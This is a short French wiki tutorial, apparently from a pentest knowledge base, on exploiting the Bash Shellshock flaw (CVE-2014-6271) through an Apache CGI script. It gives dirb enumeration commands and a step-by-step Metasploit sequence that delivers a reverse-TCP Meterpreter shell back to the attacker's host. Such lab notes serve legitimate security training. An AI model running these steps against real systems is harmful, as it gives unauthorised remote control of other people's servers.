Shelshock metasploit

De wiki.nexiat.fr
Aller à la navigation Aller à la recherche
Fiche express
Vulnérabilité Shellshock (Bash, CVE-2014-6271)
Vecteur CGI Apache (mod_cgi)
Module exploit/multi/http/apache_mod_cgi_bash_env_exec
Voir aussi Vsftp backdoor · Unreal irc

Exploitation de la vulnérabilité Shellshock (faille Bash, CVE-2014-6271) via un script CGI Apache : une variable d'environnement piégée est interprétée par Bash et exécute du code à distance.

Découverte des répertoires

dirb http://192.168.0.1/ /usr/share/dirb/wordlists/common.txt
dirb http://192.168.0.1/cgi-bin /usr/share/dirb/wordlists/common.txt

Exploitation

msfconsole
search mod_cgi
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOST Domain.tld
set TARGETURI /cgi-bin/script.sh
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST IP_Localhost
exploit

Voir aussi